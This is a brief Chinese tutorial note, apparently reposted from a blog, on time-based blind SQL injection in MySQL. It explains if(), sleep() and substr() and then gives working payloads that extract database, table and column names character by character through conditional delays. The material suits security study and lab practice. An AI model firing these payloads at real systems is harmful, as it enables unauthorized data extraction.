時間盲注

時間 2020-07-10

標籤時間简体版

原文原文鏈接

  MySQL函數 

  if()：IF(expr1,expr2,expr3)，若是expr1的值爲true，則返回expr2的值，若是expr1的值爲false， 

  則返回expr3的值。 

  sleep(N)：經過在MySQL中執行select sleep(N)可讓此語句運行N秒鐘。 

     substr()：截取字符串（用法：substr(string string,num start,num length);string爲字符串；start爲起始位置；length爲長度。注意：mysql中的start是從1開始的）

   數據庫名： 
  if((select ascii(substr(database(),1,1)) limit 0,1)>0,sleep(2),0)，直接二分法 
 
    數據表名： 
   if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='security' limit 0,1)>0,sleep(2),0) 
  
     數據列名： 
    if((select ascii(substr(column_name,1,1)) from information_schema.columns where table_name='users' limit 0,1)>0,sleep(2),0)

相關標籤/搜索